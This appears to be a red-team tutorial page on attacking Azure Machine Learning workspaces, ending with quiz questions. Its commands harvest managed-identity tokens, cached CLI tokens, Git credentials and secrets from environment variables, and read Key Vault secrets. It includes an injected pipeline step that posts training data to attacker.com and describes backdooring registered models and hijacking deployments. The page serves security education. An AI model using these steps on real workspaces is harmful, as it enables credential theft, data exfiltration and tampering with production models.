Azure ML Exploitation
Red team attack methodology for Azure Machine Learning: workspace security, compute instance attacks, pipeline poisoning, model registry tampering, and data store exploitation.
Azure ML Exploitation
Azure Machine Learning is Microsoft's enterprise ML platform providing managed compute, experimentation tracking, automated ML, model deployment, and MLOps pipelines. From a red team perspective, Azure ML workspaces are high-value targets because they aggregate access to sensitive data, trained models, compute resources, and credentials for external services. A compromised workspace often provides paths to both the ML pipeline and the broader Azure environment.
Workspace Security
Workspace Architecture
An Azure ML workspace is associated with several dependent Azure resources:
| Resource | Purpose | Attack Relevance |
|---|---|---|
| Azure Storage Account | Default data store for experiments, models, snapshots | Training data access, model artifact theft |
| Azure Key Vault | Credential storage for workspace secrets | API keys, connection strings, certificates |
| Azure Container Registry | Docker images for training and deployment | Container image tampering, supply chain attacks |
| Application Insights | Telemetry and monitoring | Log access, operational intelligence |
# Get workspace details and associated resources
az ml workspace show --name <ws> --resource-group <rg> \
--query "{storage:storage_account, keyVault:key_vault, acr:container_registry}"
# List workspace connections (may contain credentials)
az ml connection list --workspace-name <ws> --resource-group <rg>RBAC Exploitation
Azure ML uses several built-in roles with different privilege levels:
| Role | Capabilities | Red Team Interest |
|---|---|---|
AzureML Data Scientist | Run experiments, deploy models, access compute | Training pipeline access, model deployment |
AzureML Compute Operator | Manage compute resources | Create compute for credential theft |
Contributor on workspace | Full workspace management | All workspace operations including connections |
Reader on workspace | View workspace contents | Enumerate assets, view experiment logs |
Compute Instance Attacks
Compute as a Pivot Point
Azure ML compute instances are managed VMs with Jupyter, VS Code, and terminal access. They function similarly to SageMaker notebook instances as pivot points for lateral movement.
# List compute instances
az ml compute list --workspace-name <ws> --resource-group <rg> --type ComputeInstance
# Get compute details
az ml compute show --name <compute> --workspace-name <ws> --resource-group <rg>
# Access via workspace (creates access URL)
# Navigate to Azure ML Studio > Compute > Instances > ConnectCredential Harvesting
From a compromised compute instance:
# Managed identity token for Azure management
curl -H "Metadata: true" \
"http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
# Managed identity token for storage access
curl -H "Metadata: true" \
"http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://storage.azure.com/"
# Check for cached Azure CLI credentials
cat ~/.azure/accessTokens.json 2>/dev/null
cat ~/.azure/msal_token_cache.json 2>/dev/null
# Check environment variables for credentials
env | grep -i -E "(key|secret|password|token|connection)"
# Check for Git credentials (common on data science instances)
cat ~/.git-credentials 2>/dev/null
git config --global credential.helperStartup Script Attacks
Azure ML compute instances support setup scripts that run on creation. If modifiable, these scripts provide persistence:
# Check if the compute has a setup script
az ml compute show --name <compute> --workspace-name <ws> --resource-group <rg> \
--query "setup_scripts"Shared Compute Risks
When multiple data scientists share a workspace, compute instances may be accessible to other workspace users depending on configuration:
- SSH access: If SSH is enabled, other workspace users with the SSH key can access the instance
- Shared file systems: Workspace-level file shares may be mounted across compute instances
- Terminal access: Workspace contributors can access terminal sessions on any compute instance in the workspace
Pipeline Poisoning
Pipeline Architecture
Azure ML pipelines define multi-step ML workflows: data preprocessing, feature engineering, model training, evaluation, and deployment. Pipelines are defined as code (Python SDK or YAML) and executed on workspace compute.
Attack Vectors
Pipeline definition tampering
Modify pipeline definitions to inject malicious steps. If pipeline code is stored in a connected Git repository, compromise the repository to modify pipeline logic.
# Injected pipeline step that exfiltrates training data - name: exfiltrate_data command: > curl -X POST https://attacker.com/collect -d @${{inputs.training_data}} environment: azureml:default-env:1 compute: azureml:cpu-clusterEnvironment manipulation
Azure ML environments define the software dependencies for pipeline steps. Tampering with environment definitions allows dependency injection:
# List environments az ml environment list --workspace-name <ws> --resource-group <rg> # Register a modified environment with malicious packages az ml environment create --file modified-env.yml \ --workspace-name <ws> --resource-group <rg>Component substitution
Azure ML pipelines use reusable components. Registering a malicious component with the same name (but a newer version) causes pipelines to pick up the tampered version on their next execution.
Schedule manipulation
Pipelines can run on schedules. Modifying a schedule to trigger a poisoned pipeline at a specific time allows timed attacks:
# List schedules az ml schedule list --workspace-name <ws> --resource-group <rg>
Model Registry Tampering
Registry Structure
The Azure ML model registry stores model versions with metadata, lineage tracking, and deployment state. It serves as the source of truth for which model versions are deployed to production endpoints.
# List registered models
az ml model list --workspace-name <ws> --resource-group <rg>
# Get model details including artifact location
az ml model show --name <model> --version <ver> \
--workspace-name <ws> --resource-group <rg>Tampering Techniques
| Technique | Method | Impact |
|---|---|---|
| Version injection | Register a new version of an existing model with tampered artifacts | Next deployment picks up backdoored model |
| Artifact replacement | Modify model files in the backing storage account | Deployed model serves attacker-controlled predictions |
| Metadata manipulation | Change model tags or properties to influence selection | Automated pipelines deploy the wrong model |
| Lineage spoofing | Register models with fabricated experiment lineage | Bypass provenance checks |
Deployment Hijacking
Azure ML supports managed online endpoints (fully managed) and Kubernetes online endpoints (customer-managed AKS):
# List online endpoints
az ml online-endpoint list --workspace-name <ws> --resource-group <rg>
# Get endpoint details
az ml online-endpoint show --name <endpoint> \
--workspace-name <ws> --resource-group <rg>
# List deployments within an endpoint
az ml online-deployment list --endpoint-name <endpoint> \
--workspace-name <ws> --resource-group <rg>Deployment hijacking: update an existing deployment to point to a tampered model version, or modify traffic routing to send requests to an attacker-controlled deployment.
Data Store Exploitation
Data Store Architecture
Azure ML data stores are abstractions over Azure storage services. They store credentials or use managed identity to access underlying storage:
# List data stores
az ml datastore list --workspace-name <ws> --resource-group <rg>
# Get data store details (may reveal storage account names, container names)
az ml datastore show --name <datastore> \
--workspace-name <ws> --resource-group <rg>Credential Extraction
Data stores can authenticate using:
- Account keys: Stored in the workspace Key Vault
- SAS tokens: Time-limited but may have broad scope
- Managed identity: Workspace identity with storage access
- Service principal: Application credentials stored in Key Vault
# Access Key Vault secrets (if workspace identity or user has access)
az keyvault secret list --vault-name <vault>
az keyvault secret show --vault-name <vault> --name <secret>Data Access Through Workspace Identity
The workspace's managed identity typically has Storage Blob Data Contributor or Storage Blob Data Reader on connected storage accounts. From a compromised compute instance:
from azure.identity import ManagedIdentityCredential
from azure.storage.blob import BlobServiceClient
credential = ManagedIdentityCredential()
blob_service = BlobServiceClient(
account_url="https://<storage>.blob.core.windows.net",
credential=credential
)
# List containers and blobs
for container in blob_service.list_containers():
print(f"Container: {container.name}")
container_client = blob_service.get_container_client(container.name)
for blob in container_client.list_blobs():
print(f" Blob: {blob.name}")Related Topics
- Azure AI Services Overview -- Service landscape and enumeration
- Azure OpenAI Attack Surface -- Azure OpenAI-specific attacks
- Defender for AI Bypass -- Evading detection during exploitation
- SageMaker Exploitation -- Comparable AWS ML platform attacks
You have the AzureML Data Scientist role on a workspace. Which of the following can you NOT do?
Why is Azure ML pipeline poisoning particularly difficult to detect?
References
- Azure ML Security -- Enterprise security documentation
- Azure ML RBAC -- Role-based access control
- Azure ML Data Stores -- Data store configuration